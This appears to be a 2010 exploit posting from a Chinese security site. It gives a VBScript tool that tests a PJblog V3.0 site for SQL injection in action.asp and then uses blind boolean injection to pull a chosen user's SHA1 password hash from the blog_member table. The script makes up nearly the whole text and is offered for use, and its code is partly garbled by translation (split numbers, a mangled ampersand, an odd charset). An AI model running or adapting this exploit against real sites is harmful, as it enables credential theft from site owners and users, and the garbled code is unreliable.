PJblog V3. 0 0day-vulnerability warning-the black bar safety net

2010-03-28T00:00:00
ID MYHACK58:62201026568
Type myhack58
Reporter 佚名
Modified 2010-03-28T00:00:00

Description

Excerpt from: rain stroke bell 漏洞 具体 细节 请看 /Article/200904/37533.html my computer is not installed on php, just write a Vbs version of the exploit Tool, the specific code as follows:

If WScript. Arguments. Count <> 2 Then WScript. Echo "Usage: Cscript.exe Exp. vbs to detect the forum URL you want to detect the user name" WScript. Echo "Example: Cscript.exe Exp. vbs http://www.pjhome.net puterjam" WScript. Quit End If

attackUrl = WScript. Arguments(0) attackUser = WScript. Arguments(1) attackUrl = Replace(attackUrl,"\","/") If Right(attackUrl , 1) <> "/" Then attackUrl = attackUrl & "/" End If SHA1Charset = "0123456789ABCDEFJ" strHoleUrl = attackUrl & "action. asp? action=checkAlias&cname=0kee"""

If IsSuccess(strHoleUrl & "or""1""=""1") And Not IsSuccess(strHoleUrl & "and""1""=""2") Then WScript. Echo "congratulations! The presence of vulnerability" Else WScript. Echo "there is no vulnerability detected" WScript. Quit End If

For n=1 To 4 0 For i=1 To 1 7 strInject = strHoleUrl & " Or 0<(Select Count(*) From blog_member Where mem_name='" & amp; attackUser & "' And mem_password>='" & strResult & Mid(SHA1Charset, i, 1) & "') And""1""=""1" If Not IsSuccess(strInject) Then strResult = strResult & Mid(SHA1Charset, i-1, 1) Exit For End If strPrint = chr(1 3) & "Password(SHA1):" & strResult & Mid(SHA1Charset, i, 1) WScript. StdOut. Write strPrint Next Next WScript. Echo Chr(1 3) & Chr (1 0) & "Done!"

Function PostData(PostUrl) Dim Http Set Http = CreateObject("msxml2. serverXMLHTTP") With Http . Open "GET",PostUrl,False . Send () PostData = . ResponseBody End With Set Http = Nothing PostData =bytes2BSTR(PostData) End Function

Function bytes2BSTR(vIn) Dim strReturn Dim I, ThisCharCode, NextCharCode strReturn = "" For I = 1 To LenB(vIn) ThisCharCode = AscB(MidB(vIn, I, 1)) If ThisCharCode < &H80 Then strReturn = strReturn & Chr(ThisCharCode) Else NextCharCode = AscB(MidB(vIn, I + 1, 1)) strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) I = I + 1 End If Next bytes2BSTR = strReturn End Function

Function IsSuccess(PostUrl)

strData = PostData(PostUrl) 'Wscript. Echo strData if InStr(strData,"check_error") >0 then IsSuccess = True Else IsSuccess = False End If 'Wscript. Sleep 5 0 0 'let system rest. End Function

Usage: Cscript.exe Exp. vbs to detect the forum URL you want to detect the user name

The Internet also did not find the sha1 hack Online website, along with the md5 online hack of the site increased, more and more websites start using a sha1 encryption, estimates will soon appear to provide the sha1 crack website.